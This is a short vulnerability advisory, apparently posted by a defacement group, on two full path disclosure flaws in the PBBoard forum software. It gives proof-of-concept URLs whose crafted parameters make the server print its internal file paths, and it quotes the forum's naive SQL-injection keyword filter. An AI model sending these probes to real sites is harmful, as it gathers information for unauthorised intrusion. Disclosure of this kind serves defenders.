60 lines
No EOL
1.7 KiB
Text
60 lines
No EOL
1.7 KiB
Text
Advisory]PBBoard <=2.0.2 - Full Path Disclosure
|
||
Details
|
||
=======
|
||
Product: PHP <= PBBoard
|
||
Security-Risk: moderated
|
||
Remote-Exploit: yes
|
||
Vendor-URL: http://www.pbboard.com
|
||
|
||
Credits
|
||
============
|
||
Discovered by: rUnViRuS
|
||
site: http://www.sec-area.com
|
||
|
||
Affected Products:
|
||
----------------------------
|
||
test on PBBoard 2.0.2
|
||
maybe work under 2.0.2
|
||
|
||
More Details
|
||
============
|
||
1. Full Path Disclosure
|
||
-----------------------------------
|
||
allow attackers to gather the real path of the server side script.
|
||
|
||
Proof of concept:
|
||
http://www.[xxxxx].com/path/index.php?page=new_topic&index=1&id=union
|
||
|
||
error
|
||
Fatal error: Call to undefined method PowerBBLocalCommon::error() in /home/xxx/public_html/vb/common.php on line 193
|
||
|
||
code :
|
||
// Check if $_GET don't value any SQL Injection
|
||
foreach ($PowerBB->_GET as $sql_get)
|
||
{
|
||
if ((eregi("select", $sql_get)) or
|
||
(eregi("union", $sql_get)) or
|
||
(eregi("%", $sql_get)))
|
||
{
|
||
$this->error('ظ?ظ?طھ ط¨ط¹ظ?ظ?ظٹظ? ط؛ظٹط± ظ?ط´ط±ظ?ط¹ظ?!');
|
||
}
|
||
}
|
||
================
|
||
================
|
||
2. Full Path Disclosure
|
||
-----------------------------------
|
||
allow attackers to gather the real path of the server side script.
|
||
|
||
Proof of concept:
|
||
http://www.[xxxx].com/[path]/index.php?page=search&start=1&keyword=§ion=
|
||
all&search=1
|
||
|
||
Warning: filesize() [function.filesize]: stat failed for show_msg in /home/xxxxx/public_html/vb/includes/template.class.php on line 99
|
||
|
||
Fatal error: ERROR::FILE_SIZE_IS_ZERO in /home/xxxxx/public_html/vb/includes/template.class.php on line 146
|
||
|
||
--------------------------------------------------
|
||
[W]orld [D]efacers [T]eam
|
||
http://www.Sec-area.com
|
||
|
||
-------------------------------------------------- |